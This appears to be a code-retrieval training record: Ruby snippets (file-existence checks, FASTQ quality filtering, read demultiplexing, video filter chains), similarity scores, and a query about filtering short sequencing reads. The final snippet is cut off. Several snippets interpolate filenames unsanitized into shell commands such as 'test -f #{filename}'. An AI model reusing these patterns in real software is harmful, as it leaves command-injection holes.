"def check_exists\n filename = params[\"file\"]\n if !valid_filename(filename, nil)\n Rails.logger.warn(\"check_exists: Invalid filename received (#{filename})\")\n render :json => {error: \"Invalid filename\"}, status: 400\n return\n end\n\n full_filename = ENV[\"EAD_XML_PENDING_FILES_PATH\"] + \"/\" + filename\n exist = File.exist?(full_filename)\n render :json => {exist: exist}\n end",
"def file_exists?(path)\n run(\"test -f #{path}\").success?\n end",
"def file_correct?(file_path)\n raise 'ERROR: Is your file path correct ?' unless File.exist?(file_path)\n end",
"def Check_File(_Filename)\r\n unless File.exist?(\"#{_Filename.to_s}.yml\")\r\n File.open(\"#{_Filename.to_s}.yml\", 'w')\r\n end\r\nend",
"def check\n file_nil\n if @file.end_with?(\".txt\")\n if File.exist?(@file)\n @f = Command_File.new(@file)\n else\n raise \"File \\\"#{@file}\\\" does not Exist\n Please choose a \\\".txt\\\" file that exists\"\n end\n else\n raise \"Invalid Input File \\\"#{@file}\\\"\n File must end in \\\".txt\\\"\"\n end\n end",
"def contents_detected?\n true if find_first_match(:matching => /Gitlab/, :in_file => \"Rakefile\")\n end",
"def check_file(filename)\n lines = []\n line_num = 0\n # Get tags to search in file\n pattern = define_regexp\n # Read lines of file\n File.open(filename, 'r') do |file|\n file.each_line do |line|\n line_num += 1\n lines << [line_num, line] if line =~ /#{pattern}/i\n end\n end\n # Report results in json file\n report_results(filename, lines, 'tags') if @options[:report]\n # Print results if required\n unless @options[:quiet] || lines.empty?\n puts\n @options[:jenkins] ?\n puts(\"=== #{filename} ===\") :\n puts(\"=== #{filename} ===\".bold)\n print_tags(lines)\n end\n 0\n end",
"def file_exists?(filename)\n\tif !File.exists?(filename) \n\t\tabort \"Unable to read file #{filename}\"\n\tend\nend",
"def check_file(filename)\n flog_res = `flog -abcm #{filename}`\n results = parse_flog_output(flog_res)\n unless @options[:quiet] || (results[:total].to_i == 0)\n unless @options[:dev]\n puts\n @options[:jenkins] ?\n puts(\"=== #{filename} ===\") :\n puts(\"=== #{filename} ===\".bold)\n end\n print_complexity_scores(filename, results)\n end\n report_results(filename, results, 'complexity') if @options[:report]\n (results[:total].to_i == 0) ? 0 : 1\n end",
"def file?() end",
"def cry_exist?(filename)\n return File.exist?(filename)\n end",
"def check_file_exists(file_name)\n \tif File.exist?(file_name)\n logger.fatal \"#{file_name} already exists.\"\n \t\tabort\n \tend\n end",
"def valid_file?(file,type)\n\tif type == \"csv\"\n\t\tif file.nil?\n\t\t\tputs \"Please provide a source .csv file\"\n\t\t\texit 0\n\t\tend\n\tend\n\tif !File.exists?(file)\n\t\tputs \"#{file} doesn't seem to exist. Please check\\nyour file path and try again.\"\n\t\texit 0\n\tend\n\ttrue\nend",
"def has_file?(filename)\n self.files.detect {|f| f[:name] == filename }.present?\n end",
"def file_exists?(filename)\n shell_exec(\"test -f #{filename}\")\n rescue\n false\n else\n true\n end",
"def tests_for_file(filename)\n super.select { |f| @files.has_key? f }\n end",
"def verify_target\n # subclasses must implement this method\n puts \"verify_target - not overloaded. file=#{filename}\"\n end",
"def check_files fnames\n fnames.each do |fname|\n AbortIf.abort_unless_file_exists fname\n end\n end",
"def test_file_exists?(host, file_rel_path)\n host.execute(\"test -f \\\"#{get_test_file_path(host, file_rel_path)}\\\"\",\n :acceptable_exit_codes => [0, 1]) do |result|\n return result.exit_code == 0\n end\nend",
"def check_file(name, extension, type)\n file = \"#{name}#{extension}\"\n return false unless loadable? file\n\n @type = type\n @feature = file\n @file_path = file\n @load_path = file\n\n return true\n end",
"def file_name?\n !read_attribute('file_name').blank?\n end",
"def check_file(path)\n raise Error, \"The path '#{path}' does not exist or is not a file\" unless path.file? || attrs[:exists] == false\n end",
"def destination_file_exist?\n File.exist?(final_destination_path)\n end",
"def watched_file?(filename)\n false\n end",
"def filename_ok?(src)\n return false if src.nil? or src.empty?\n\n if src.match bad_image_names_regex\n log \"Found bad filename for image: #{src}\"\n false\n else\n true\n end\n end",
"def check_for fn\n File.readable?( fn ) && fn\n end",
"def file_exists?\n !!file_path\n end",
"def file_exists?\n !!file_path\n end",
"def valid_file?(file)\n case file\n when 'exclude.exclude', 'include.include',\n 'include_exclude.exclude', 'include_exclude.include',\n 'env_exclude.env.exclude', 'env_include.env.include',\n 'include_env_exclude.include', 'include_env_exclude.env.exclude',\n 'include_exclude_env_include.exclude',\n 'include_exclude_env_exclude.include',\n 'include_env_include_env_exclude.env.exclude',\n 'exclude_env_include.exclude',\n 'exclude_env_include.env.include',\n /^include_env_include\\..*include$/,\n /^include_exclude_env_include\\..*include$/,\n /^include_exclude_env_exclude\\..*exclude$/,\n /^include_env_include_env_exclude\\..*include$/,\n /^exclude_env_exclude\\..*exclude$/,\n /^env_include_env_exclude\\.env\\./,\n /^exclude_env_include_env_exclude\\.(env\\.|exclude$)/,\n /^include_exclude_env_include_env_exclude\\./,\n /^env_symbol\\..*include$/\n return true\n when /^default\\./, /^exclude\\./, /^include\\./,\n /^env_exclude\\./, /^env_include\\./, /^include_env_include\\./,\n /^include_env_exclude\\./, /^include_exclude_env_include\\./,\n /^include_exclude_env_exclude\\./, /^exclude_env_include\\./,\n /^include_env_include_env_exclude\\./, /^exclude_env_exclude\\./,\n /^env_include_env_exclude\\./, /^exclude_env_include_env_exclude/,\n /^env_symbol\\./\n return false\n end\n\n # Raise an error if the file was not handled by existing logic.\n raise \"Invalid file (#{file}) specified in #{__method__}.\"\n end",
"def file_exists?(filename, ref)\n return (not `cd #{@path}; git ls-tree #{ref} -- #{filename}`.chomp.strip.empty?)\n end",
"def validFile? filename\n if !filename.kind_of? String\n return false\n elsif File.exists? filename\n return File.readable? filename\n else\n return false\n end\nend",
"def virtual_file?(name); end",
"def process_rb_project(filename, output_path)\n fail 'This feature is under development'.red\nend",
"def file_exists?\n File.exists?(@filename)\n end",
"def file_exists?(file)\n File.exists?(file)\n end",
"def file_exists?(path)\n end",
"def fileExists?(filename)\n shell_exec(\"test -f #{filename}\") rescue return false\n true\n end",
"def check_file_exists(filename)\n\tif File.exist?(filename)\n\t\tputs \"image #{filename} found\"\n\telse\n\t\tabort \"ERROR: image #{filename} not found.\"\n\tend\nend",
"def file?(path)\n eval(FILE_CHECK, binding, __FILE__, FILE_CHECK_LINE)\n nil\nend"
] |
[
"0.7120127",
"0.6571621",
"0.6322864",
"0.63166326",
"0.62577915",
"0.6230915",
"0.6212493",
"0.6163979",
"0.60827714",
"0.6009272",
"0.5990768",
"0.5990521",
"0.5979753",
"0.5979753",
"0.5974482",
"0.5944724",
"0.5919892",
"0.5919619",
"0.5919449",
"0.59115267",
"0.5900052",
"0.58713776",
"0.5864228",
"0.5858817",
"0.5829713",
"0.58248425",
"0.581286",
"0.5810526",
"0.57967824",
"0.5795544",
"0.5793387",
"0.57912046",
"0.5788318",
"0.57866776",
"0.5786513",
"0.5786335",
"0.57856584",
"0.578004",
"0.5777634",
"0.5775468",
"0.57743245",
"0.5773512",
"0.5769102",
"0.57680357",
"0.5757735",
"0.57369494",
"0.5723787",
"0.5718138",
"0.5711349",
"0.57035553",
"0.56979847",
"0.56891185",
"0.56872815",
"0.5686305",
"0.567834",
"0.56738317",
"0.56729245",
"0.56727827",
"0.5665088",
"0.56629497",
"0.5650538",
"0.56500757",
"0.56494164",
"0.5637448",
"0.5634511",
"0.56325996",
"0.56234246",
"0.56206846",
"0.5615732",
"0.5610897",
"0.56086975",
"0.56076664",
"0.56001735",
"0.5594025",
"0.5587536",
"0.5584901",
"0.5580186",
"0.557972",
"0.55789137",
"0.5567699",
"0.55651504",
"0.55622673",
"0.55515414",
"0.5543341",
"0.5541876",
"0.55409604",
"0.5537854",
"0.5530251",
"0.5529867",
"0.5528957",
"0.5522531",
"0.5514121",
"0.551279",
"0.55107665",
"0.551046",
"0.54944575",
"0.54797924",
"0.5478686",
"0.5478041",
"0.5459952"
] |
0.69970137
|
1
|
Quality filters reads minlen discard all shorter reads Returns nothing
|
def filter(minlen)
return if skip_step?(@names.get('filter'), 'filtering')
# Only filter input files from Illumina CASAVA 1.8 pipeline
if `head -n 1 #{@names.get('reads')} | cut -d ' ' -f 3`.empty?
run_cmd(
'fastq_illumina_filter' \
" --keep N -v -l #{minlen} " \
" -o #{@names.get('filter')}" \
" #{@names.get('reads')}"
)
else
@names.set('filter', '.fastq')
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def filter_quality(min_quality)\n mode_lines = @raw_data.scan(/harminv.*:, (\\d.*)/).join \"\\n\"\n CSV.parse(mode_lines,\n :converters => :numeric).find_all {|nums| nums[2].abs > min_quality}\n end",
"def truncate_samples\n @samples.sort!{|a,b| a.duration <=> b.duration}\n @samples.slice!(0..-(max_capacity + 1))\n end",
"def quality_start?\r\n if inn.to_i >= 6 && self.r.to_i < 4\r\n return true\r\n end\r\n return false\r\n end",
"def check_max_samples_exceeded\n # loop over each stripwell and sum the num samples in each to find total num samples\n num_samples = 0\n operations.map { |op| op.input(\"PCR\").collection }.uniq.each do |stripwell|\n num_samples = num_samples + stripwell.num_samples\n end\n if num_samples > 96\n operations.store io: \"input\", interactive: false\n raise \"The fragment analyzer can only hold 96 samples at once. This job has #{num_samples} total samples\"\n end\n num_samples\n end",
"def calculate_min_read \n self.min_read = (content.length / 1375.0).ceil\n end",
"def trim_data\n @buffer.keys.each do |k| \n diff = @buffer[k].count - (1.0 * @scene_width / @x_mul).ceil.to_i\n @buffer[k] = @buffer[k].drop(diff) if diff > 0\n end\n end",
"def quality\n s = ( @step > 0 and semitones - (12 * @step) ) || semitones\n n = ( @step > 0 and number - (7 * @step) ) || number\n QUALITIES[n][s]\n end",
"def trim_requested; end",
"def sample_length_with_overflow(tick_sample_length)\n @tracks.keys.collect {|track_name| @tracks[track_name].sample_length_with_overflow(tick_sample_length) }.max || 0\n end",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.error \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif (seq.seq_qual.size>0)\n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\" \n\n @low=@params.get_param('min_quality').to_i\n\n if @params.get_param('window_width').to_i>seq.seq_fasta.length \n @window=seq.seq_fasta.length \n \n else \n @window=@params.get_param('window_width').to_i\n end \n @cut_off=@window*@low \n \n type='ActionLowQuality' \n low_qual=0\n actions=[] \n \n p_begin,p_end =0,-1 # positions from high quality bounds \n \n \n \n while ((p_begin>=0) && (p_end + 1 < seq.seq_qual.size) ) \n \n \n p_begin_old,p_end_old= p_begin, p_end\n p_begin,p_end = find_high_quality(seq.seq_qual,p_end+1) \n \n if ((p_begin>0) && (p_begin-p_end_old-1>=@window/2)) #if we have found the high quality part, and the low quality part has enough size \n # it's created an action before of the high quality part \n add_action_before_high_qual(p_begin,p_end,actions,seq,p_end_old+1) \n\n # puts \"low1 ini fin #{p_end_old+1} #{p_begin-1} = #{p_begin-1-p_end_old-1+1}\" \n low_qual = p_begin-1-p_end_old-1 + 1 \n \n add_stats('low_qual',low_qual)\n # @stats[:low_qual]={low_qual => 1} \n \n end\n \n # puts \"-----ññññ----- high quality #{p_begin} #{p_end}+#{seq.insert_start} seq size #{seq.seq_fasta.size}\"\n\n end\n \n # puts \"high [#{p_begin}, #{p_end}] old [#{p_begin_old}, #{p_end_old}] size #{seq.seq_qual.size}\" \n if ((p_begin>=0) && (p_end+1<seq.seq_qual.size)) #if we have found the high quality part \n \n # it's created an action after of the high quality part \n add_action_after_high_qual(p_begin,p_end,actions,seq) \n # puts \"low2 ini fin #{p_end+1} #{seq.seq_fasta.size-1} = #{seq.seq_fasta.size-1-p_end-1+1}\"\n low_qual = seq.seq_fasta.size-1 - p_end-seq.insert_start-1 + 1\n # if @stats[:low_qual][low_qual].nil?\n # @stats[:low_qual][low_qual] = 0\n # end\n # @stats[:low_qual][low_qual] += 1 \n add_stats('low_qual',low_qual) \n # @stats[:low_qual]={low_qual => 1} \n end \n\n # puts \"-----ññññ----- high quality #{p_begin} #{p_end}\" \n \n \n if p_end<0 and p_end_old #add action low qual to all the part \n a = seq.new_action(p_end_old+1 ,seq.seq_fasta.size-1,\"ActionLowQuality\") # adds the ActionInsert to the sequence before adding the actionMid\n # puts \"new low qual start: #{p_end_old+1} end: #{seq.seq_fasta.size-1} = #{seq.seq_fasta.size-1 - p_end_old-1 + 1}\" \n low_qual = seq.seq_fasta.size-1 - p_end_old-1 + 1 \n \n # if @stats[:low_qual][low_qual].nil?\n # @stats[:low_qual][low_qual] = 0\n # end\n # @stats[:low_qual][low_qual] += 1 \n add_stats('low_qual',low_qual) \n # @stats[:low_qual]={'low_qual' => 1} \n \n actions.push a\n end\n \n # puts \"------- ADDING ACTIONs LOW QUAL #{actions.size}\" \n seq.add_actions(actions)\n end \n\n end",
"def optimize(original_song, max_pattern_length)\n # 1.) Create a new song, cloned from the original\n optimized_song = original_song.copy_ignoring_patterns_and_flow\n\n # 2.) Subdivide patterns\n optimized_song = subdivide_song_patterns(original_song, optimized_song, max_pattern_length)\n\n # 3.) Prune duplicate patterns\n optimized_song = prune_duplicate_patterns(optimized_song)\n\n optimized_song\n end",
"def trim_silence\n AudioFile.new(Audio.trim_silence(0.03, 0.1, @audio))\n end",
"def quality(pipeline, level)\n pipeline.quality!(level)\n end",
"def rescaling_required?\n flac_info.streaminfo[\"bits_per_sample\"] != 16\n end",
"def decrease_quality_by1(item)\n if item.quality > @min_quality # ENSURE QUALITY NEVER NEGATIVE\n item.quality -= 1\n end\n end",
"def quality?(quality)\n quality >= 0 && quality < 50\n end",
"def trim(seqses)\n # Avoid truly horrific quadratic behavior. TODO: I think there\n # may be a way to get perfect trimming without going quadratic.\n return seqses.flatten(1) if seqses.size > 100\n\n # Keep the results in a separate array so we can be sure we aren't\n # comparing against an already-trimmed selector. This ensures that two\n # identical selectors don't mutually trim one another.\n result = seqses.dup\n\n # This is n^2 on the sequences, but only comparing between\n # separate sequences should limit the quadratic behavior.\n seqses.each_with_index do |seqs1, i|\n result[i] = seqs1.reject do |seq1|\n # The maximum specificity of the sources that caused [seq1] to be\n # generated. In order for [seq1] to be removed, there must be\n # another selector that's a superselector of it *and* that has\n # specificity greater or equal to this.\n max_spec = _sources(seq1).map do |seq|\n spec = seq.specificity\n spec.is_a?(Range) ? spec.max : spec\n end.max || 0\n\n result.any? do |seqs2|\n next if seqs1.equal?(seqs2)\n # Second Law of Extend: the specificity of a generated selector\n # should never be less than the specificity of the extending\n # selector.\n #\n # See https://github.com/nex3/sass/issues/324.\n seqs2.any? do |seq2|\n spec2 = _specificity(seq2)\n spec2 = spec2.begin if spec2.is_a?(Range)\n spec2 >= max_spec && _superselector?(seq2, seq1)\n end\n end\n end\n end\n result.flatten(1)\n end",
"def remove_dead_ends(minlen)\n segments.each do |s|\n c = connectivity(s)\n rm(s) if s.length < minlen and\n (c[0] == 0 or c[1] == 0) and\n !cut_segment?(s)\n end\n self\n end",
"def filter_lengths(strings, length=5)\n strings.select { |string| string.length >= length }\nend",
"def trim_silence!\n @audio = Audio.trim_silence(0.03, 0.1, @audio)\n nil\n end",
"def filter_lengths(strings, length=5)\n strings.select { |each| each.length >= length }\nend",
"def remaining_filters\n filters[@processed..-1]\n end",
"def stopstop minsize=30\n type = \"XX\"\n orfs = []\n translate = Nucleotide::Translate.new(@trn_table)\n aa_frames = translate.aa_frames(@seq)\n num = 0\n aa_frames.each do | aa_frame |\n frame = aa_frame[:frame]\n aa = aa_frame[:sequence]\n aa_start = 0\n aa.split(/\\*/).each do | candidate |\n if candidate.size >= minsize and candidate.size > 0\n orf = ORF.new(num,type,@id,@descr,@seq,frame,aa_start*3,candidate)\n orfs.push orf\n num += 1\n end\n aa_start += candidate.size + 1\n end\n end\n orfs.sort\n end",
"def doing_raw_file_to_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.read(\"../../Documents/20111224-research.txt\")\n\t new = a.to_textual\n#TODO finishe\t \n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 50 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def filter_by_filesize(images, min_bytes, max_bytes)\n found = 0\n images.map do |image|\n bytes = get_bytes_for_image image\n log \"%s bytes - %s\" % [bytes, image]\n if found < 20 and bytes and (bytes == 0 or bytes > min_bytes) and bytes < max_bytes\n log \"filter_by_filesize: Found potential image - size: #{bytes} bytes, src: #{image}\"\n found += 1\n image\n else\n nil\n end\n end.compact\n end",
"def filtered_scan_minimum\n filtered_scan.tap do |scan|\n scan.cache_blocks = false\n scan.setMaxVersions 1\n\n # A filter that will only return the first KV from each row\n # A filter that will only return the key component of each KV\n filters = [FirstKeyOnlyFilter.new, KeyOnlyFilter.new]\n if flist = scan.getFilter\n filters.each do |filter|\n flist.addFilter filter\n end\n else\n scan.setFilter FilterList.new(filters)\n end\n end\n end",
"def strict_filters; end",
"def ex1\n WaveFile::Reader.new(\n File.expand_path('../440Hz,441samples.wav', File.dirname(__FILE__))\n ) do |reader|\n samples = reader.read(441).samples.to_a\n #puts samples.map(&:inspect).join(\",\")\n samples_to_graph!(samples, '440constant')\n embiggen_and_imgcat!('440constant')\n end\nend",
"def quality\n base.quality\n end",
"def less_than_fifty_filter(item)\r\n special_item_routing(item) if is_less_than_fifty_quality?(item)\r\n end",
"def compress\n input_len = @input.bytesize\n tmp = optipng(quantize(@input))\n\n # Check to see whether we've improved the situation\n output_len = tmp.bytesize\n if input_len > output_len\n $LOG.debug \" %d bytes -> %d bytes = %.1f%%\" % [ input_len, output_len, 100 * output_len/input_len ] if $LOG.debug?\n @output = tmp\n @modified = true\n else\n $LOG.debug \" no gain\" if $LOG.debug?\n @output = @input\n @modified = false\n end\n self\n end",
"def filter; end",
"def filter; end",
"def filter; end",
"def trim_length\n \t400\n end",
"def doing_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.readlines(\"./tmp/insert_researches.txt\")\n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 52 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, \".1.clipped.fastq\")\n r = MiGA::Result.new(\"#{base}.json\")\n if result_files_exist?(base, \".2.clipped.fastq\")\n r = add_files_to_ds_result(r, name,\n pair1: \".1.clipped.fastq\", pair2: \".2.clipped.fastq\",\n single: \".1.clipped.single.fastq\")\n else\n r = add_files_to_ds_result(r, name, single: \".1.clipped.fastq\")\n end\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n r\n end",
"def filter_by_precursor_mass_tolerance!\n pmt = params.peptide_mass_tolerance.to_f\n methd = nil # the method to \n\n case params.peptide_mass_units\n when '0'\n amu_based = true\n milli_amu = false\n when '1'\n amu_based = true\n milli_amu = true\n when '2'\n amu_based = false\n end\n\n self.filtered_by_precursor_mass_tolerance = true\n self.out_files.each do |out_file|\n hits = out_file.hits\n before = hits.size\n hits.reject! do |pep|\n if amu_based\n if milli_amu\n (pep.deltamass.abs > (pmt/1000))\n else\n (pep.deltamass.abs > pmt)\n end\n else\n (pep.ppm.abs > pmt)\n end\n end\n if hits.size != before\n out_file.hits = hits # <- is this necessary \n Mspire::Sequest::Srf::Out::Peptide.update_deltacns_from_xcorr(hits)\n out_file.num_hits = hits.size\n end\n end\n self\n end",
"def quality_and_strip(percentage)\n manipulate! do |img|\n img.format('jpg') # We want to enforce jpeg so we can use good compression.\n img.strip # Do not store EXIF data in the thumb to save space\n img.quality(percentage.to_s)\n img = yield(img) if block_given?\n img\n end\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def filters\n fail Error, \"Nothing to roll...\" unless @reels\n fail Error, \"Supporting just full_screen for now, sorry.\" unless @reels.all?(&:full_screen?)\n return @filters if @filters\n\n idx = process.output_index(self)\n\n @filters = []\n\n # Concatting\n segments = []\n\n @reels.each_with_index do |curr_reel, i|\n\n lbl = nil\n\n if curr_reel.reel\n\n # NOTE mapping input to this lbl\n\n lbl = \"o#{idx}rl#{i}\"\n\n # NOTE Image-Padding to match the target resolution\n # TODO full screen only at the moment (see exception above)\n\n Ffmprb.logger.debug \"#{self} asking for filters of #{curr_reel.reel.io.inspect} video: #{channel(:video)}, audio: #{channel(:audio)}\"\n @filters.concat(\n curr_reel.reel.filters_for lbl, video: channel(:video), audio: channel(:audio)\n )\n end\n\n trim_prev_at = curr_reel.after || (curr_reel.transition && 0)\n transition_length = curr_reel.transition ? curr_reel.transition.length : 0\n\n if trim_prev_at\n\n # NOTE make sure previous reel rolls _long_ enough AND then _just_ enough\n\n prev_lbl = segments.pop\n\n lbl_pad = \"bl#{prev_lbl}#{i}\"\n # NOTE generously padding the previous segment to support for all the cases\n @filters.concat(\n Filter.blank_source trim_prev_at + transition_length,\n channel(:video).resolution, channel(:video).fps, \"#{lbl_pad}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.silent_source trim_prev_at + transition_length, \"#{lbl_pad}:a\"\n ) if channel?(:audio)\n\n if prev_lbl\n lbl_aux = lbl_pad\n lbl_pad = \"pd#{prev_lbl}#{i}\"\n @filters.concat(\n Filter.concat_v [\"#{prev_lbl}:v\", \"#{lbl_aux}:v\"], \"#{lbl_pad}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.concat_a [\"#{prev_lbl}:a\", \"#{lbl_aux}:a\"], \"#{lbl_pad}:a\"\n ) if channel?(:audio)\n end\n\n if curr_reel.transition\n\n # NOTE Split the previous segment for transition\n\n if trim_prev_at > 0\n @filters.concat(\n Filter.split \"#{lbl_pad}:v\", [\"#{lbl_pad}a:v\", \"#{lbl_pad}b:v\"]\n ) if channel?(:video)\n @filters.concat(\n Filter.asplit \"#{lbl_pad}:a\", [\"#{lbl_pad}a:a\", \"#{lbl_pad}b:a\"]\n ) if channel?(:audio)\n lbl_pad, lbl_pad_ = \"#{lbl_pad}a\", \"#{lbl_pad}b\"\n else\n lbl_pad, lbl_pad_ = nil, lbl_pad\n end\n end\n\n if lbl_pad\n\n # NOTE Trim the previous segment finally\n\n new_prev_lbl = \"tm#{prev_lbl}#{i}a\"\n\n @filters.concat(\n Filter.trim 0, trim_prev_at, \"#{lbl_pad}:v\", \"#{new_prev_lbl}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.atrim 0, trim_prev_at, \"#{lbl_pad}:a\", \"#{new_prev_lbl}:a\"\n ) if channel?(:audio)\n\n segments << new_prev_lbl\n Ffmprb.logger.debug \"Concatting segments: #{new_prev_lbl} pushed\"\n end\n\n if curr_reel.transition\n\n # NOTE snip the end of the previous segment and combine with this reel\n\n lbl_end1 = \"o#{idx}tm#{i}b\"\n lbl_reel = \"o#{idx}tn#{i}\"\n\n if !lbl # no reel\n lbl_aux = \"o#{idx}bk#{i}\"\n @filters.concat(\n Filter.blank_source transition_length, channel(:video).resolution, channel(:video).fps, \"#{lbl_aux}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.silent_source transition_length, \"#{lbl_aux}:a\"\n ) if channel?(:audio)\n end # NOTE else hope lbl is long enough for the transition\n\n @filters.concat(\n Filter.trim trim_prev_at, trim_prev_at + transition_length, \"#{lbl_pad_}:v\", \"#{lbl_end1}:v\"\n ) if channel?(:video)\n @filters.concat(\n Filter.atrim trim_prev_at, trim_prev_at + transition_length, 